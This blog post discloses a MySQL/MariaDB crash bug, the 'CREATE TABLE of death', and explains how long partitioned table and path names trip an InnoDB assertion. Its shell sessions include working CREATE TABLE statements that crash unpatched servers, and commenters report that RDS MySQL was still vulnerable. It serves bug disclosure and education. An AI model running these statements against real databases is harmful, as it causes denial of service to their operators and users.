Tuesday, November 28, 2017

Here is the CREATE TABLE of death

In a previous post, I talked about the existence of a CREATE TABLE that is crashing MySQL up to versions 5.5.58, 5.6.38 and 5.7.20, and MariaDB up to version 5.5.57, 10.0.32, 10.1.26 and 10.2.7.  I hope you upgraded (or can mitigate this problem in another way) as I am now publishing the CREATE TABLE of death.

The first thing to clarify about the CREATE TABLE of death is that it is not a bug in the implementation of InnoDB Persistent Statistics.  I found this bug while stressing their implementation and I first thought that it was related, but it is not the case.  There are still many strange things in their implementation but it is not the main subject of this post.

Before giving more technical details about this, it is worth discussing a little why I am sharing this information.  After all, we are talking about a crashing bug, which is not a small thing.  Some people think that this should not be widely discussed (their main argument is that sharing this information will hurt people that are still vulnerable).  Some others think that sharing all available information should be done as quickly as possible.  I am in the middle and I think that all available information should be shared at an appropriate time.  This is a complex debate and I would need more time than this post allows to discuss it in detail.  Let's just say that I think the time is right for widely sharing information about the CREATE TABLE of death.

Let's now dive in the gory technical details.  In the stack trace shared in my previous post, we can see the following:
Failing assertion: norm_len < FN_REFLEN - 1
Grepping the MySQL source code for "norm_len < FN_REFLEN - 1", we get the following:
$ grep -r "norm_len < FN_REFLEN - 1"
mysql-5.7.17/storage/innobase/handler/ha_innodb.cc:     ut_a(norm_len < FN_REFLEN - 1);
(Note that "ut_a" is a "#define" to "assert".)

The line of the "grep" above is from the "create_table_info_t::normalize_table_name_low" function.  Looking at the code, we can gather that this is about file path processing.  It now becomes clearer: something wrong is happening while trying to deal with a file name.  Grepping a little more, we can find that "FN_REFLEN" is defined as a 512-character limit for a full path-name:
$ grep -r "define.*FN_REFLEN" [...] mysql-5.7.17/include/my_global.h:#define FN_REFLEN 512 /* Max length of full path-name */ [...]
Marko Mäkelä wrote a detailed comment about this subject on my previous post.  I am only publishing it now as I felt it was too early to share this information before.  I encourage you to read the full comment to get the thoughts of an InnoDB expert/developer.

Back to the technical details, 512 characters (the value of "FN_REFLEN") looks enough to store the full path-name of a file.  After all, schema and table names are limited to 64 characters.  So once adding the directory separator ("/" on Linux) and the extension (".ibd"), a full path-name would be limited to 64+1+64+4 = 133 characters.  This assumption is however naive.

MySQL implements a safe representation of schema and table names on disk.  Below, we can see that a "é" is replaced by "@0p" for a schema name.
# mysql <<< "CREATE DATABASE test_jfgagne; CREATE DATABASE test_jfgagné"
# ( cd "$(sed -ne '/^datadir/s/.* //p' /etc/my.cnf)"; ls -1dtr test_jfga*; )
test_jfgagne
test_jfgagn@0p
So above can lead to a 3 to 1 expansion for the length of a schema directory name (the same applies to table file names).  As Marko is pointing out in his comment, we can even have a 5 to 1 expansion as shown below.
# mysql <<< 'CREATE DATABASE test_jfg_$'
# ( cd "$(sed -ne '/^datadir/s/.* //p' /etc/my.cnf)"; ls -1dtr test_jfg_*; )
test_jfg_@0024
So we are now at a maximum full path-name of 2*(64*5)+1+4 = 645 characters.  This is more than the defined value of "FN_REFLEN".  Let's try to abuse it:
# mysql <<< 'CREATE DATABASE IF NOT EXISTS $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$;'
ERROR 13 (HY000) at line 1: Can't get stat of './@0024[...]@0024' (Errcode: 36 - File name too long)
# mysql <<< '
    CREATE DATABASE IF NOT EXISTS test_jfg;
    CREATE TABLE test_jfg.$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ ( id int(10) ) ENGINE=InnoDB;'
ERROR 1005 (HY000) at line 2: Can't create table '$[...]$' (errno: 36)
Hum, abusing the maximum file-path name length is not that easy.  We could stop here but we would miss the good stuff !  Referring again to Marko's comment, we can read the following: "[...] more than extfs can handle".  This hints us in the direction of a limit in the filesystem.  With the CREATE DATABASE and TABLE above, we were trying to create a directory and file names of length 64*5 = 320.  This is larger than the maximum file name size of my filesystem (I am testing with XFS which has a maximum file name size of 255).  Let's verify that:
# ( cd "$(sed -ne '/^datadir/s/.* //p' /etc/my.cnf)"; touch $(tr " " "a" <<< "$(printf "%255s" " ")"); )
# ( cd "$(sed -ne '/^datadir/s/.* //p' /etc/my.cnf)"; touch $(tr " " "a" <<< "$(printf "%256s" " ")"); )
touch: cannot touch ‘a[...]a’: File name too long
Above is proving us that creating a file with a name of 255 characters is working, but that we cannot create a file with a name of 256 characters.  Let's refine our CREATE DATABASE and TABLE:
# mysql <<< '
    CREATE DATABASE IF NOT EXISTS $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$;
    USE $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$;
    CREATE TABLE $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ ( id int(10) ) ENGINE=InnoDB;'
# ( cd "$(sed -ne '/^datadir/s/.* //p' /etc/my.cnf)"; ls -1tr @0024*/*; )
@0024[...]@0024/db.opt
@0024[...]@0024/@0024[...]@0024.frm
@0024[...]@0024/@0024[...]@0024.ibd
# mysql '$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$' <<< '
    CREATE TABLE $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$a ( id int(10) ) ENGINE=InnoDB;'
ERROR 1860 (HY000) at line 2: Long database name and identifier for object resulted in path length exceeding 512 characters. Path: './@0024[...]@0024/@0024[...]@0024@
So the first CREATE DATABASE and TABLE above are working (with a schema name length on disk of 255 and a table name length of 254) but the second CREATE TABLE fails with an error message mentioning the 512-character limit.  We have no CREATE TABLE of death here (yet).

We could stop there but there are other code paths to explore.  One of them is partitioning.  With partitioning, it is easy to generate long file names.  Let's look at this example:
# mysql <<< '
    CREATE DATABASE IF NOT EXISTS test_jfg;
    CREATE TABLE test_jfg.test_jfg_p (
      id int(10) unsigned NOT NULL PRIMARY KEY
    ) ENGINE=InnoDB PARTITION BY RANGE (id) (
      PARTITION test_jfg_p1 VALUES LESS THAN (1000),
      PARTITION pmax VALUES LESS THAN MAXVALUE);'
# ( cd "$(sed -ne '/^datadir/s/.* //p' /etc/my.cnf)"; ls -1dtr test_jfg/test_jfg_p*; )
test_jfg/test_jfg_p.frm
test_jfg/test_jfg_p#P#test_jfg_p1.ibd
test_jfg/test_jfg_p#P#pmax.ibd
So partitioning uses file names that are the concatenation of the table name, "#P#" and the partition name.  With that, we can get a maximum full path-name length of 3*(64*5)+1+3+4 = 968.  Let's try to abuse this:
# mysql -N <<< "
    SELECT VERSION();
    CREATE DATABASE IF NOT EXISTS éééééééééééééééééééééééééééééééééééééééééééééééééééééééééééééééé;
    USE éééééééééééééééééééééééééééééééééééééééééééééééééééééééééééééééé;
    CREATE TABLE éééééééééééééééééééééééééééééééééééééééééééééééééééééééééééééééé (
      id int(10) unsigned NOT NULL PRIMARY KEY
    ) ENGINE=InnoDB PARTITION BY RANGE (id) (
      PARTITION éééééééééééééééééééééééééééééééééééééééééééééééééééééééééééééééé VALUES LESS THAN (1000),
      PARTITION pmax VALUES LESS THAN MAXVALUE);"
5.7.17-log
ERROR 2013 (HY000) at line 5: Lost connection to MySQL server during query
Here it is: we have a CREATE TABLE crashing MySQL 5.7.17 !  It is not the original CREATE TABLE of death but it is close.  With this CREATE TABLE, we are generating a full path-name longer than 512 characters (3*(64*3)+1+3+4 = 584).  As MySQL 5.7.17 is not validating the full path-name length for partitioned tables (we have previously shown that this validation is done for normal tables), the "ut_a" ("assert") in the file "storage/innobase/handler/ha_innodb.cc" is reached.  The quick fix is simple: make sure the assert is not reached by testing the length of the full path-name and reporting an error if it exceeds 512 characters.  This is done in this commit and MySQL 5.7.20 reports the error below (it is strange that the error message for non-partitioned table is different to the one for partitioned tables but I will not spend more time on this message).
# mysql -N <<< "
    SELECT VERSION();
    CREATE DATABASE IF NOT EXISTS éééééééééééééééééééééééééééééééééééééééééééééééééééééééééééééééé;
    USE éééééééééééééééééééééééééééééééééééééééééééééééééééééééééééééééé;
    CREATE TABLE éééééééééééééééééééééééééééééééééééééééééééééééééééééééééééééééé (
      id int(10) unsigned NOT NULL PRIMARY KEY
    ) ENGINE=InnoDB PARTITION BY RANGE (id) (
      PARTITION éééééééééééééééééééééééééééééééééééééééééééééééééééééééééééééééé VALUES LESS THAN (1000),
      PARTITION pmax VALUES LESS THAN MAXVALUE);"
5.7.20-log
ERROR 1680 (HY000) at line 5: The path specified for @0p[...]0p@ is too long.
Before discussing in more details the CREATE TABLE of death, it is worth noting that some CREATE TABLE that were working in 5.7.17 are now failing in 5.7.20.  I think those might be related to the fix for the CREATE TABLE of death.  I opened the two below bugs about this:


To be able to exploit the CREATE TABLE of death above, one needs to be able to create a database (schema).  I was not able to repeat a crash with a normal (relatively short) database name and standard partitioning (it does not mean this is not possible).  However, this can be done with sub-partitioning which generate even longer file names:
# mysql <<< "
    CREATE TABLE test_jfg.test_jfg_sp (
      id int(10) unsigned NOT NULL,
      id2 int(10) unsigned NOT NULL,
      PRIMARY KEY (id, id2)
    ) ENGINE=InnoDB PARTITION BY RANGE (id) SUBPARTITION BY HASH (id2) (
        PARTITION test_jfg_sp1 VALUES LESS THAN (1000) (SUBPARTITION s0, SUBPARTITION s1),
        PARTITION pmax VALUES LESS THAN MAXVALUE (SUBPARTITION s2, SUBPARTITION s3));"
# ( cd "$(sed -ne '/^datadir/s/.* //p' /etc/my.cnf)"; ls -1dtr test_jfg/test_jfg_sp*; )
test_jfg/test_jfg_sp.frm
test_jfg/test_jfg_sp#P#pmax#SP#s3.ibd
test_jfg/test_jfg_sp#P#pmax#SP#s2.ibd
test_jfg/test_jfg_sp#P#test_jfg_sp1#SP#s1.ibd
test_jfg/test_jfg_sp#P#test_jfg_sp1#SP#s0.ibd
So with sub-partitioning, we can get a maximum full path-name length of 4*(64*5)+1+3+4+4 = 1292.  Let's also try to abuse this with a standard schema name:
# mysql -N <<< "
    SELECT VERSION();
    CREATE DATABASE IF NOT EXISTS test_jfg;
    CREATE TABLE test_jfg.éééééééééééééééééééééééééééééééééééééééééééééééééééééééééééééééé (
      id int(10) unsigned NOT NULL,
      id2 int(10) unsigned NOT NULL,
      PRIMARY KEY (id, id2)
    ) ENGINE=InnoDB PARTITION BY RANGE (id) SUBPARTITION BY HASH (id2) SUBPARTITIONS 2 (
        PARTITION çççççççççççççççççççççççççççççççççççççççççççççççççççççççççççç VALUES LESS THAN (1000),
        PARTITION pmax VALUES LESS THAN MAXVALUE ENGINE = InnoDB);"
5.7.17-log
ERROR 2013 (HY000) at line 4: Lost connection to MySQL server during query
Above is my original CREATE TABLE of death.  It is probably very easy to craft others.  It does not need the creation of a database with a twisted name (remember that I was trying to generate a "table_name" longer than 255 bytes in the "mysql.innodb_table_stats" table; more details in my post Fun with InnoDB Persistent Statistics and More fun with InnoDB Persistent Statistics).  I suspect that Oracle registered this vulnerability with CVE-2017-10384 as the text of this CVE matches what I am describing in this post.  For reference, I reported this under Bug#86934, which is a security bug so private, and the internal bug number according to the 5.7.20 release notes is 26390632.

Now you know everything about the CREATE TABLE of death.  Use this information wisely.

4 comments:

  1. I tried it on a freshly deployed instance of RDS MySQL (their latest is 5.7.19) and it does indeed crash immediately on your initial table of death. In my experience the users of RDS have a high tendency to use the out-of-the-box RDS admin account as the application user. Also many deploy the RDS instance publicly accessible. This means that anyone with a RDS MySQL instance that has a user with too permissive grants can expect a denial of service attack soon.

    Maybe it's a good idea to unpublish your post, notify AWS and wait until they have patched their RDS MySQL version. So far they offer up to 5.7.19, 5.6.37 and 5.5.57, and none of those versions have been patched.

    ReplyDelete
    Replies
    1. Hi Art, the post is still out, so I obviously not fully agree about un-publishing it. I am not sure "anyone with a RDS MySQL instance" is vulnerable as "too permissive grants" (and widely distributed credentials) also incur risks of data lost. Still, this is a complex debate and I entourage anyone having thoughts on this to post a comment here.

      Delete
    2. Hi JF, I do understand your point by having too permissive grants also incur risks of data being lost. I fully agree with you that exposing a user with too permissive grants is something you should never do. However I see no difference in the case of running MySQL yourself and being vulnerable with a too permissive user.
      Please explain to me what the difference in risk would be between running RDS MySQL and plain MySQL? In other words: why refrain from posting the ToD until it got patched in MySQL 5.7.20 (plus all other version + MariaDB), and not when the largest MySQL DaaS is still vulnerable?

      Delete
    3. "what the difference in risk": I am afraid I do not understand your question.

      MariaDB: it is already patched since 5.5.57, 10.0.32, 10.1.26 and 10.2.7.

      "largest MySQL DaaS": I have to confess that I do not follow AWS much, I published my previous post once it was fixed in 5.7.20 (almost 6 weeks ago). I might take AWS into account on the next crashing bug I find.

      We can move this discussion to chat if you want. I already sent you a few messages on Facebook chat.

      Delete